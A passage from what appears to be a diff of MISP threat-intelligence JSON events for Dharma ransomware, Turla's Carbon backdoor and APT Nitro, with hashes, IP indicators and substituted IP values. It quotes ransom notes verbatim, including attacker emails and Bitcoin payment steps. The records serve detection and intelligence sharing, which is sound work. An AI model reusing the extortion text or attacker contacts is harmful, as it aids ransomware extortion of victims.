etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} -{"Event":{"Attribute":{"id":"10794","type":"domain|ip","category":"Network activity","to_ids":false,"uuid":"5bf30242-8ef4-4c52-a2d7-0b7b0a016219","event_id":"14","distribution":"5","timestamp":"1542652482","comment":"1st stage","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"your-ip.getmyip.com|178.128.103.74","Galaxy":[],"ShadowAttribute":[]},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} +{"Event":{"Attribute":{"id":"10794","type":"domain|ip","category":"Network activity","to_ids":false,"uuid":"5bf30242-8ef4-4c52-a2d7-0b7b0a016219","event_id":"14","distribution":"5","timestamp":"1542652482","comment":"1st stage","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"your-ip.getmyip.com|89.160.20.156","Galaxy":[],"ShadowAttribute":[]},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} {"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"External analysis","comment":"Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"4","first_seen":null,"id":"342","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1490878550","to_ids":false,"type":"link","uuid":"58dd0056-6e74-43d5-b58b-494802de0b81","value":"https://www.virustotal.com/file/7fa4482bfbca550ce296d8e791b1091d60d733ea8042167fd0eb853530584452/analysis/1486030116/"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["Alexandre Dulaunoy","Florian Roth","Timo Steffens","Christophe Vandeplas","Dennis Rand","raw-data"],"collection_uuid":"0d821b68-9d82-4c6d-86a6-1071a9e0f79f","description":"Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features...for now!","galaxy_id":"36","id":"5828","local":false,"meta":{"refs":["https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf","https://objective-see.com/blog/blog_0x25.html#Snake"],"synonyms":["Snake","Uroburos","Urouros"],"type":["Backdoor","Rootkit"]},"source":"MISP Project","tag_id":"22","tag_name":"misp-galaxy:tool=\"Turla\"","type":"tool","uuid":"22332d52-c0c2-443c-9ffb-f08c0d23722c","value":"Turla","version":"138"}],"description":"Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.","icon":"optin-monster","id":"36","name":"Tool","namespace":"misp","type":"tool","uuid":"9b8037f7-bc8f-4de1-a797-37266619bc0b","version":"3"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2015-01-20","distribution":"3","id":"369","info":"OSINT Analysis of Project Cobra Another extensible framework used by the Uroburos’ actors from Gdata","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"1","timestamp":"1498163317","uuid":"54bf5a6f-ac50-4f71-9cd3-7080950d210b"}},{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2014-11-20","distribution":"3","id":"621","info":"Turla digging using TotalHash","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"2","timestamp":"1498163604","uuid":"546daad5-425c-4ac4-82c7-e07f950d210b"}}],"ShadowAttribute":[],"Tag":[{"colour":"#065100","exportable":true,"hide_tag":false,"id":"22","local":0,"name":"misp-galaxy:tool=\"Turla\"","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"100","date":"2017-03-30","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"4","info":"OSINT - Carbon Paper: Peering into Turla’s second stage backdoor","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226330","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1493403824","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1077","type":"sha256","category":"External analysis","to_ids":true,"uuid":"54324042-49fc-4628-a95e-44da950d210b","event_id":"2","distribution":"5","timestamp":"1412579394","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0a1103bc90725d4665b932f88e81d39eafa5823b0de3ab146e2d4548b7da79a0","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} -{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1084","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"54324081-3308-4f1f-8674-4953950d210b","event_id":"2","distribution":"5","timestamp":"1412579457","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"223.25.233.248","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1084","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"54324081-3308-4f1f-8674-4953950d210b","event_id":"2","distribution":"5","timestamp":"1412579457","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"89.160.20.156","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto 